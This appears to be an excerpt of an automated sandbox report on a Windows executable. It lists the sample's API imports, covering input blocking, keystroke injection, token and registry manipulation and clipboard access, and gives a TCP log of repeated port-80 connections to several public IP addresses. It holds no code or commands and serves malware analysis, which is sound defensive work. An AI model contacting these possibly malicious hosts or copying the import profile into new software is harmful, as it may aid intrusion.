                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 06:31:32.047560930 CET4971080192.168.2.83.33.130.190
                                                                    Jan 11, 2025 06:31:32.052403927 CET80497103.33.130.190192.168.2.8
                                                                    Jan 11, 2025 06:31:32.052582026 CET4971080192.168.2.83.33.130.190
                                                                    Jan 11, 2025 06:31:32.060307026 CET4971080192.168.2.83.33.130.190
                                                                    Jan 11, 2025 06:31:32.065146923 CET80497103.33.130.190192.168.2.8
                                                                    Jan 11, 2025 06:31:40.439129114 CET80497103.33.130.190192.168.2.8
                                                                    Jan 11, 2025 06:31:40.439147949 CET80497103.33.130.190192.168.2.8
                                                                    Jan 11, 2025 06:31:40.439392090 CET4971080192.168.2.83.33.130.190
                                                                    Jan 11, 2025 06:31:40.443933964 CET4971080192.168.2.83.33.130.190
                                                                    Jan 11, 2025 06:31:40.448750019 CET80497103.33.130.190192.168.2.8
                                                                    Jan 11, 2025 06:31:59.103537083 CET4971480192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:31:59.108433962 CET804971438.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:31:59.108551025 CET4971480192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:31:59.119663000 CET4971480192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:31:59.124500036 CET804971438.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:00.626224995 CET4971480192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:00.671559095 CET804971438.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:01.155564070 CET804971438.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:01.155720949 CET4971480192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:01.646420002 CET4971580192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:01.651307106 CET804971538.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:01.651396990 CET4971580192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:01.666533947 CET4971580192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:01.671412945 CET804971538.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:03.173162937 CET4971580192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:03.219631910 CET804971538.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:03.703644991 CET804971538.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:03.703828096 CET4971580192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:04.192682028 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:04.197649002 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:04.197752953 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:04.208389997 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:04.213239908 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:04.213304996 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:05.720163107 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:05.767541885 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.285603046 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.285676956 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.739291906 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.744144917 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.744342089 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.753786087 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.758563042 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:08.797334909 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:08.797657013 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:08.798890114 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:08.803680897 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:13.847774982 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.853022099 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:13.853224039 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.866683006 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.871493101 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.495951891 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.495975018 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.496048927 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:15.380177021 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.395328999 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.400371075 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:16.400469065 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.412672997 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.417519093 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062359095 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062387943 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062496901 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:17.923496962 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.942923069 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.947873116 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:18.948008060 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.963241100 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.968154907 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:18.968297005 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589622021 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589703083 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589883089 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:20.470098019 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.488651037 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.493556976 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:21.493635893 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.500574112 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.505424976 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136074066 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136101961 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136154890 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136276007 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.136276007 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.138978004 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.143773079 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:27.474062920 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.479115009 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:27.479242086 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.489717960 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.494600058 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.076931000 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.076950073 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.077068090 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:29.001240969 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.020100117 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.025069952 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.025209904 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.035326004 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.040153027 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615391970 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615487099 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615567923 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:31.548389912 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.567142963 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.572042942 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:32.572208881 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.584050894 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.589011908 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:32.589049101 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174417019 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174483061 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174751997 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:34.095170975 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.120641947 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.125529051 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.125607967 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.133351088 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.138118982 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709069014 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709090948 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709266901 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.711860895 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.716696978 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:41.150513887 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.155347109 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:41.155430079 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.166868925 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.171668053 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302730083 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302755117 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302772999 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302828074 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:42.673336029 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.692039013 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.697490931 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:43.697601080 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.709134102 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.714788914 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.841963053 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842019081 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842061996 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842116117 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:44.842117071 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:45.220666885 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.240266085 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.245440006 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:46.245552063 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.257361889 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.262387991 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:46.262535095 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458950996 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458973885 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458993912 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.459156036 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:47.767055035 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.786011934 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.791069984 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:48.791241884 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.798449039 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.803345919 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940907955 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940936089 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940949917 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940963030 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.941126108 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.941224098 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.945931911 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.950822115 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:55.072422981 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.077641010 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.077708006 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.164902925 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.170633078 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715848923 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715867996 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715882063 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.716032028 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:56.673203945 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.791033030 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.795967102 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:57.796077013 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.899036884 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.905044079 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426966906 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426983118 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426994085 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.427050114 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:58.427159071 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:59.407748938 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.426839113 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.432030916 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:00.432223082 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.443574905 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.448533058 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:00.448704004 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068217993 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068237066 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068315029 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:01.070286989 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.070348024 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:01.954783916 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.974371910 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.979302883 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:02.979377985 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.987945080 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.992746115 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593358994 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593379021 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593389988 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593400002 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593441010 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593575001 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.593611002 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.598190069 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.603064060 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:08.689729929 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.694603920 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:08.694713116 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.706007957 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.710973024 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.301889896 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.301949978 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.302045107 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:10.220149994 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.238459110 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.243726969 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.243844032 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.255626917 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.260548115 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836436987 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836471081 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836657047 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:12.766964912 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.785535097 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.790574074 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:13.790676117 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.805814028 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.810686111 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:13.810758114 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:14.379079103 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:14.379122972 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:14.379223108 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:15.313821077 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.332540035 CET4973780192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.338088036 CET804973785.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:16.338193893 CET4973780192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.348191023 CET4973780192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.353653908 CET804973785.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:16.923230886 CET804973785.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:16.923333883 CET804973785.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:16.923413038 CET4973780192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.926070929 CET4973780192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:16.930849075 CET804973785.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:22.166731119 CET4973880192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:22.171595097 CET8049738136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:22.171711922 CET4973880192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:22.182205915 CET4973880192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:22.187060118 CET8049738136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:22.781953096 CET8049738136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:22.781972885 CET8049738136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:22.781986952 CET8049738136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:22.782099962 CET4973880192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:23.694812059 CET4973880192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:24.708230019 CET4973980192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:24.713180065 CET8049739136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:24.713294029 CET4973980192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:24.724750996 CET4973980192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:24.729666948 CET8049739136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:25.301229954 CET8049739136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:25.301256895 CET8049739136.143.186.12192.168.2.8
